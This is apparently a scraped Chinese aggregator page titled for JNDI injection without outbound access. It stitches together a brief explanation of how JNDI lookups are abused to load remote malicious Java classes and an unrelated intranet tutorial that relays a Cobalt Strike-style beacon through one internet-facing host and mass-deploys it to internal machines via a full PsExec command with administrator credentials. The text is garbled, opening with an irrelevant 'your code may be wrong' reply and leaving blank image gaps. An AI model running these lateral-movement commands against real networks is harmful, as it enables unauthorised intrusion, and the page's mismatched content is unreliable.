jndi注入不出网

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了jndi注入不出网相关的知识,希望对你有一定的参考价值。

参考技术A 您好,可能是您的代码输入错误了。
当一个需要被获取的对象的名称可以被远程控制的时候,黑客可以将被攻击的java客户端的jndi请求指向恶意的服务地址,恶意的资源服务地址响应了恶意的java对象,这个对象是“javax.naming.Reference" 的示例,JNDI客户端客户端会尝试解析该对象的classFactory和classFactoryLocation属性。如果这classFactory属性是未知的,那么java会使用URLClassLoade从classFactoryLocation处获取字节码。
就是这么简单的机制,‘initialContext.lookup‘方法即使没有直接暴露在污点数据中,我们可以利用它进行漏洞利用。很多时候,我们可以通过反序列化和不安全的反射的攻击方式来实现攻击。

内网------不出网批量上线

先将可出网的一台机设置中转

 

 

 

 生成马子,把马子和PsExec传到出网的机子上,之后用PsExec执行命令

PsExec.exe -accepteula \\\\192.168.241.171,192.168.241.172 -u Administrator -p xxxxx -d -c C:\\Windows\\Temp\\beacon.exe

 

 

 

 在上线成功的机子上可以看到是通过192.168.241.156这台机的4444端口流量出网的

 

 

以上是关于jndi注入不出网的主要内容,如果未能解决你的问题,请参考以下文章

[Java安全]C3P0反序列化不出网利用学习

[Java安全]C3P0反序列化不出网利用学习

[Java安全]JNDI注入学习

[Java安全]JNDI注入学习

在 Spring 中忽略 JNDI 资源注入 (@Resource)

Fastjson 反序列化 Jndi 注入利用 JdbcRowSetImpl 链